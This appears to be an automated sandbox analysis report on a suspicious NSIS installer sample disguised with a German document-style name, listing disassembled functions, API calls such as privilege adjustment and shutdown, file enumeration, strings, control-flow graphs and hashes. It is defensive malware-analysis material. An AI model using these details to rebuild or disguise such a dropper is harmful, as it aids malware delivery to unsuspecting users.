                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403845
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
                                                            • ExitProcess.KERNEL32 ref: 0040388D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe$C:\Users\user\classrooms$C:\Users\user\classrooms$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 2488574733-1944624732
                                                            • Opcode ID: 9d094df354a64ac00225b874e1f21de582985ea5e934b42c4bdb5f03e135a873
                                                            • Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
                                                            • Opcode Fuzzy Hash: 9d094df354a64ac00225b874e1f21de582985ea5e934b42c4bdb5f03e135a873
                                                            • Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E
                                                            Function 0040596D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 385 40596d-405993 call 405c38 388 405995-4059a7 DeleteFileW 385->388 389 4059ac-4059b3 385->389 390 405b29-405b2d 388->390 391 4059b5-4059b7 389->391 392 4059c6-4059d6 call 40625f 389->392 393 405ad7-405adc 391->393 394 4059bd-4059c0 391->394 398 4059e5-4059e6 call 405b7c 392->398 399 4059d8-4059e3 lstrcatW 392->399 393->390 397 405ade-405ae1 393->397 394->392 394->393 400 405ae3-405ae9 397->400 401 405aeb-405af3 call 4065a2 397->401 403 4059eb-4059ef 398->403 399->403 400->390 401->390 409 405af5-405b09 call 405b30 call 405925 401->409 406 4059f1-4059f9 403->406 407 4059fb-405a01 lstrcatW 403->407 406->407 408 405a06-405a22 lstrlenW FindFirstFileW 406->408 407->408 410 405a28-405a30 408->410 411 405acc-405ad0 408->411 425 405b21-405b24 call 4052c3 409->425 426 405b0b-405b0e 409->426 413 405a50-405a64 call 40625f 410->413 414 405a32-405a3a 410->414 411->393 416 405ad2 411->416 427 405a66-405a6e 413->427 428 405a7b-405a86 call 405925 413->428 417 405a3c-405a44 414->417 418 405aaf-405abf FindNextFileW 414->418 416->393 417->413 421 405a46-405a4e 417->421 418->410 424 405ac5-405ac6 FindClose 418->424 421->413 421->418 424->411 425->390 426->400 429 405b10-405b1f call 4052c3 call 406025 426->429 427->418 430 405a70-405a74 call 40596d 427->430 436 405aa7-405aaa call 4052c3 428->436 437 405a88-405a8b 428->437 429->390 439 405a79 430->439 436->418 440 405a8d-405a9d call 4052c3 call 406025 437->440 441 405a9f-405aa5 437->441 439->418 440->418 441->418
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75D53420,00000000), ref: 00405996
                                                            • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?), ref: 004059DE
                                                            • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?), ref: 00405A01
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 00405A07
                                                            • FindFirstFileW.KERNELBASE(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 00405A17
                                                            • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405AB7
                                                            • FindClose.KERNEL32(00000000), ref: 00405AC6
                                                            Strings
                                                            • (?z, xrefs: 004059C6
                                                            • \*.*, xrefs: 004059D8
                                                            • "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe", xrefs: 0040596D
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040597B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                            • API String ID: 2035342205-3494801066
                                                            • Opcode ID: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                                            • Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
                                                            • Opcode Fuzzy Hash: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                                            • Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E
                                                            Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 665 4065a2-4065b6 FindFirstFileW 666 4065c3 665->666 667 4065b8-4065c1 FindClose 665->667 668 4065c5-4065c6 666->668 667->668
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,007A4F70,fareafvrgende\Djrve27.gud,00405C81,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,75D53420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75D53420), ref: 004065AD
                                                            • FindClose.KERNELBASE(00000000), ref: 004065B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID: fareafvrgende\Djrve27.gud$pOz
                                                            • API String ID: 2295610775-1196040977
                                                            • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                            • Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
                                                            • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                            • Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8
                                                            Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 139 403d1b-403d2d 140 403d33-403d39 139->140 141 403e6e-403e7d 139->141 140->141 142 403d3f-403d48 140->142 143 403ecc-403ee1 141->143 144 403e7f-403ec7 GetDlgItem * 2 call 4041f4 SetClassLongW call 40140b 141->144 147 403d4a-403d57 SetWindowPos 142->147 148 403d5d-403d60 142->148 145 403f21-403f26 call 404240 143->145 146 403ee3-403ee6 143->146 144->143 161 403f2b-403f46 145->161 151 403ee8-403ef3 call 401389 146->151 152 403f19-403f1b 146->152 147->148 154 403d62-403d74 ShowWindow 148->154 155 403d7a-403d80 148->155 151->152 174 403ef5-403f14 SendMessageW 151->174 152->145 160 4041c1 152->160 154->155 157 403d82-403d97 DestroyWindow 155->157 158 403d9c-403d9f 155->158 163 40419e-4041a4 157->163 165 403da1-403dad SetWindowLongW 158->165 166 403db2-403db8 158->166 164 4041c3-4041ca 160->164 168 403f48-403f4a call 40140b 161->168 169 403f4f-403f55 161->169 163->160 176 4041a6-4041ac 163->176 165->164 172 403e5b-403e69 call 40425b 166->172 173 403dbe-403dcf GetDlgItem 166->173 168->169 170 403f5b-403f66 169->170 171 40417f-404198 DestroyWindow EndDialog 169->171 170->171 178 403f6c-403fb9 call 406281 call 4041f4 * 3 GetDlgItem 170->178 171->163 172->164 179 403dd1-403de8 SendMessageW IsWindowEnabled 173->179 180 403dee-403df1 173->180 174->164 176->160 177 4041ae-4041b7 ShowWindow 176->177 177->160 209 403fc3-403fff ShowWindow KiUserCallbackDispatcher call 404216 EnableWindow 178->209 210 403fbb-403fc0 178->210 179->160 179->180 183 403df3-403df4 180->183 184 403df6-403df9 180->184 187 403e24-403e29 call 4041cd 183->187 188 403e07-403e0c 184->188 189 403dfb-403e01 184->189 187->172 192 403e42-403e55 SendMessageW 188->192 194 403e0e-403e14 188->194 189->192 193 403e03-403e05 189->193 192->172 193->187 197 403e16-403e1c call 40140b 194->197 198 403e2b-403e34 call 40140b 194->198 205 403e22 197->205 198->172 207 403e36-403e40 198->207 205->187 207->205 213 404001-404002 209->213 214 404004 209->214 210->209 215 404006-404034 GetSystemMenu EnableMenuItem SendMessageW 213->215 214->215 216 404036-404047 SendMessageW 215->216 217 404049 215->217 218 40404f-40408e call 404229 call 403cfc call 40625f lstrlenW call 406281 SetWindowTextW call 401389 216->218 217->218 218->161 229 404094-404096 218->229 229->161 230 40409c-4040a0 229->230 231 4040a2-4040a8 230->231 232 4040bf-4040d3 DestroyWindow 230->232 231->160 233 4040ae-4040b4 231->233 232->163 234 4040d9-404106 CreateDialogParamW 232->234 233->161 235 4040ba 233->235 234->163 236 40410c-404163 call 4041f4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 234->236 235->160 236->160 241 404165-404178 ShowWindow call 404240 236->241 243 40417d 241->243 243->163
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
                                                            • ShowWindow.USER32(?), ref: 00403D74
                                                            • DestroyWindow.USER32 ref: 00403D88
                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
                                                            • GetDlgItem.USER32(?,?), ref: 00403DC5
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DD9
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403DE0
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403E8E
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403E98
                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB2
                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F03
                                                            • GetDlgItem.USER32(?,00000003), ref: 00403FA9
                                                            • ShowWindow.USER32(00000000,?), ref: 00403FCA
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FDC
                                                            • EnableWindow.USER32(?,?), ref: 00403FF7
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040400D
                                                            • EnableMenuItem.USER32(00000000), ref: 00404014
                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040402C
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040403F
                                                            • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404069
                                                            • SetWindowTextW.USER32(?,007A1F20), ref: 0040407D
                                                            • ShowWindow.USER32(?,0000000A), ref: 004041B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID:
                                                            • API String ID: 3282139019-0
                                                            • Opcode ID: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
                                                            • Instruction ID: e7c2d8670a20ab778e0eeae1551072eac63d4844406393878d1a707f383ade6f
                                                            • Opcode Fuzzy Hash: fc3c2fd52c5859f2fd2362f058ebeec97e14ddaa85c60b8da330eda8cc3c5bb0
                                                            • Instruction Fuzzy Hash: B6C1CDB1504205AFDB206F61ED88E2B3A68EB96705F00853EF651B51F0CB399982DB1E
                                                            Function 0040396D Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 244 40396d-403985 call 406639 247 403987-403997 call 4061a6 244->247 248 403999-4039d0 call 40612d 244->248 256 4039f3-403a1c call 403c43 call 405c38 247->256 252 4039d2-4039e3 call 40612d 248->252 253 4039e8-4039ee lstrcatW 248->253 252->253 253->256 262 403a22-403a27 256->262 263 403aae-403ab6 call 405c38 256->263 262->263 264 403a2d-403a55 call 40612d 262->264 269 403ac4-403ae9 LoadImageW 263->269 270 403ab8-403abf call 406281 263->270 264->263 273 403a57-403a5b 264->273 271 403b6a-403b72 call 40140b 269->271 272 403aeb-403b1b RegisterClassW 269->272 270->269 287 403b74-403b77 271->287 288 403b7c-403b87 call 403c43 271->288 275 403b21-403b65 SystemParametersInfoW CreateWindowExW 272->275 276 403c39 272->276 278 403a6d-403a79 lstrlenW 273->278 279 403a5d-403a6a call 405b5d 273->279 275->271 280 403c3b-403c42 276->280 281 403aa1-403aa9 call 405b30 call 40625f 278->281 282 403a7b-403a89 lstrcmpiW 278->282 279->278 281->263 282->281 286 403a8b-403a95 GetFileAttributesW 282->286 290 403a97-403a99 286->290 291 403a9b-403a9c call 405b7c 286->291 287->280 297 403c10-403c18 call 405396 288->297 298 403b8d-403ba7 ShowWindow call 4065c9 288->298 290->281 290->291 291->281 303 403c32-403c34 call 40140b 297->303 304 403c1a-403c20 297->304 305 403bb3-403bc5 GetClassInfoW 298->305 306 403ba9-403bae call 4065c9 298->306 303->276 304->287 309 403c26-403c2d call 40140b 304->309 307 403bc7-403bd7 GetClassInfoW RegisterClassW 305->307 308 403bdd-403c00 DialogBoxParamW call 40140b 305->308 306->305 307->308 314 403c05-403c0e call 4038bd 308->314 309->287 314->280
                                                            APIs
                                                              • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                                              • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                            • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75D53420,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000), ref: 004039EE
                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\classrooms,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\classrooms,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\classrooms), ref: 00403AD5
                                                              • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
                                                            • RegisterClassW.USER32(007A79C0), ref: 00403B12
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B2A
                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403B95
                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
                                                            • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
                                                            • RegisterClassW.USER32(007A79C0), ref: 00403BD7
                                                            • DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\classrooms$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                            • API String ID: 1975747703-1640944949
                                                            • Opcode ID: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
                                                            • Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
                                                            • Opcode Fuzzy Hash: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
                                                            • Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D
                                                            Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 318 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d51 321 402f11-402f16 318->321 322 402f1b-402f49 call 40625f call 405b7c call 40625f GetFileSize 318->322 323 4030f3-4030f7 321->323 330 403036-403044 call 402e5d 322->330 331 402f4f 322->331 338 403046-403049 330->338 339 403099-40309e 330->339 332 402f54-402f6b 331->332 334 402f6d 332->334 335 402f6f-402f78 call 4032f2 332->335 334->335 344 4030a0-4030a8 call 402e5d 335->344 345 402f7e-402f85 335->345 340 40304b-403063 call 403308 call 4032f2 338->340 341 40306d-403097 GlobalAlloc call 403308 call 4030fa 338->341 339->323 340->339 364 403065-40306b 340->364 341->339 369 4030aa-4030bb 341->369 344->339 348 403001-403005 345->348 349 402f87-402f9b call 405d0c 345->349 353 403007-40300e call 402e5d 348->353 354 40300f-403015 348->354 349->354 367 402f9d-402fa4 349->367 353->354 360 403024-40302e 354->360 361 403017-403021 call 40672c 354->361 360->332 368 403034 360->368 361->360 364->339 364->341 367->354 373 402fa6-402fad 367->373 368->330 370 4030c3-4030c8 369->370 371 4030bd 369->371 374 4030c9-4030cf 370->374 371->370 373->354 375 402faf-402fb6 373->375 374->374 376 4030d1-4030ec SetFilePointer call 405d0c 374->376 375->354 377 402fb8-402fbf 375->377 380 4030f1 376->380 377->354 379 402fc1-402fe1 377->379 379->339 381 402fe7-402feb 379->381 380->323 382 402ff3-402ffb 381->382 383 402fed-402ff1 381->383 382->354 384 402ffd-402fff 382->384 383->368 383->382 384->354
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402ED2
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                              • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                                              • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                                            • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
